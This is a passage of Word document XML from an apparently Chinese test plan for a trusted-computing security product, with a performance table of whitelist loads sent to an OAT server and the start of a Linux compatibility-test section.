        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FC73886" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48D055BB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>执行策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B75B3E2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>处理时间 /秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D82D3D8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>系统占用  %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="4CBB6EF0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32068C69" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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启动OAT服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40455A88" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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一次性向OAT发送10万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FAEEAB3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>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 xml:space="preserve">10秒 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="346E9FF5"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CPU：30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12FB460F"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内存：30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="3B77E4BF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D9BBD96" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AC4F982" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性向OAT发送20万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21A4DE26" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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20秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CEB1D43"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CPU：40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72CE7BC9"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内存：40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="766FD629" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="6BDA690B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="018F44FD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="705649F7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性向OAT发送50万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39608171" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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30秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4652A30B"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CPU：50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B45B269"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内存：50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="5D8156A4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34FCB16D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>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szCs w:val="22"/>
              </w:rPr>
              <w:t>启动OAT服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D2F61C3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性发送10笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DC65465" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>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10秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CA0AFBC"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CPU：30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B82A1AD"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内存：30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="62638B82" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45E5C7E4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B324867" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性发送20笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73105156" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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20秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="540D39BE"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CPU：40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6CFE46"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内存：40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="75F88F60" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FEBF064" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3971F0F7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>一次性发送50笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6335F5E4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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30秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28271494"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CPU：50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E4D490E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>内存：50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BA1484A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>详见：持续免疫系统测试用例表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F26CF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="_Toc36487989"/>
      <w:bookmarkStart w:id="427" w:name="_Toc36573257"/>
      <w:bookmarkStart w:id="428" w:name="_Toc36630343"/>
      <w:r w:rsidRPr="0020259A">
        <w:lastRenderedPageBreak/>
        <w:t>兼容性测试</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
      <w:bookmarkEnd w:id="427"/>
      <w:bookmarkEnd w:id="428"/>
    </w:p>
    <w:p w14:paraId="3E60AA91" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="429" w:name="_Toc36487990"/>
      <w:bookmarkStart w:id="430" w:name="_Toc36573258"/>
      <w:bookmarkStart w:id="431" w:name="_Toc36630344"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景名称：Linux系统支持</w:t>
      </w:r>
      <w:bookmarkEnd w:id="429"/>
      <w:bookmarkEnd w:id="430"/>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p w14:paraId="1D7C4E93" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="432" w:name="_Toc36487991"/>
      <w:bookmarkStart w:id="433" w:name="_Toc36573259"/>
      <w:bookmarkStart w:id="434" w:name="_Toc36630345"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="432"/>
      <w:bookmarkEnd w:id="433"/>
      <w:bookmarkEnd w:id="434"/>
    </w:p>
    <w:p w14:paraId="44DF2555" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可信计算目前主要对Linux系统进行保护，目前国内外用户，Linux版本较多，差异性比较大，需要进行兼容性测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA8161B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="_Toc36487992"/>
      <w:bookmarkStart w:id="436" w:name="_Toc36573260"/>
      <w:bookmarkStart w:id="437" w:name="_Toc36630346"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行策略设计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="435"/>
      <w:bookmarkEnd w:id="436"/>
      <w:bookmarkEnd w:id="4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2"/>
        <w:gridCol w:w="2751"/>
        <w:gridCol w:w="2586"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3F3F2AC4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="429"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E64D6B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D8CDF59" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>执行策略</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>（安装、部署）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50614920" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7EF12EC2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75586862"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将安装不同的Linux操作系统的机器，安装可信模块，添加到server的可信列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BA966DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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Ubuntu14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CDC48D0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块安装</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E21832" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块开启</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71C71EB0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
